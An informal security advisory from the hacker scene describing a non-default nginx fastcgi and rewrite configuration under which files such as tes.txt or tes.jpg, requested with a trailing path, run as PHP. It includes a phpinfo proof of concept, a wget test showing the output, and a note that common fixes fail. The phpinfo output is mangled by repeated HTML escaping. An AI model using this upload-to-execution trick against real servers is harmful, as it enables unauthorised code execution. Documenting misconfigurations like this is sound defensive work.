another wrong configuration (non default) found by : Ev1lut10n

===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves , superman, cakill, ketek and all Chinese and Indonesians and all my 
bro 
===========================
yep this another configuration that trigger a hole  that i've found a bit different from the one from 80sec (http://www.80sec.com/nginx-securit.html) .  
For a fastcgi setting on nginx.conf like this (just example):

============
  fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
  if (!-e $request_filename) {
                    rewrite ^(.+)$ /index.php?q=$1 last;
                  }
=========== 
where /home/any_user/public_html can be any path , the above setting is a non default nginx configuration. 

any file extension that requested like : file.extension/any_string will be treated just like a  php script , 
ex: test.txt/any_string_without_php_extension

as example here we've a file text on /home/user/www




==========================
root@host [/home/any_user_and_path/www]# cat tes.txt

<?php phpinfo();?>


====================

 
where any request of that test.txt like this:
==============================
http://domain.com/tes.txt/any_string_without_php_extension 
=============================
will be treated as php script. 

ok, based on http://www.80sec.com/nginx-securit.html -> it suggest a patch on nginx.conf or can be on php.ini
on nginx.conf by adding:
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
or on php.ini by cgi.fix_pathinfo=0
unfortunetly this will not fix your hole when u've the wrong config above. as i've check it still  treated as php script:





===========

root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI.  PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00--  http://***********.net/tes.jpg/any_string_without_extension
           =&amp;amp;amp;amp;gt; `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ &amp;amp;amp;amp;lt;=&amp;amp;amp;amp;gt;                                                                                                              
] 46,064        --.--K/s             

08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
&amp;amp;amp;amp;lt;a href="http://www.php.net/"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img border="0" 
src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" 
/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;h1 class="p"&amp;amp;amp;amp;gt;PHP Version 
5.2.17&amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;gt;root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;On&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;On&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode_exec_dir&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;i&amp;amp;amp;amp;gt;no 
value&amp;amp;amp;amp;lt;/i&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;i&amp;amp;amp;amp;gt;no 
value&amp;amp;amp;amp;lt;/i&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode_gid&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;On&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;On&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode_include_dir&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;i&amp;amp;amp;amp;gt;no 
value&amp;amp;amp;amp;lt;/i&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;i&amp;amp;amp;amp;gt;no 
value&amp;amp;amp;amp;lt;/i&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;sql.safe_mode&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;Off&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;Off&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode_allowed_env_vars&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;PHP_&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;PHP_&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;tr&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="e"&amp;amp;amp;amp;gt;safe_mode_protected_env_vars&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;LD_LIBRARY_PATH&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;td 
class="v"&amp;amp;amp;amp;gt;LD_LIBRARY_PATH&amp;amp;amp;amp;lt;/td&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/tr&amp;amp;amp;amp;gt;
root@host [/usr/local/nginx/conf]# &amp;amp;amp;amp;lt;br /&amp;amp;amp;amp;gt;
=================================================&amp;amp;amp;amp;lt;br /&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;br /&amp;amp;amp;amp;gt;
(trust me that u must be very careful when u're gonna setting nginx and fastcgi !! a little mistake on config will trigger a hole on ur 
server)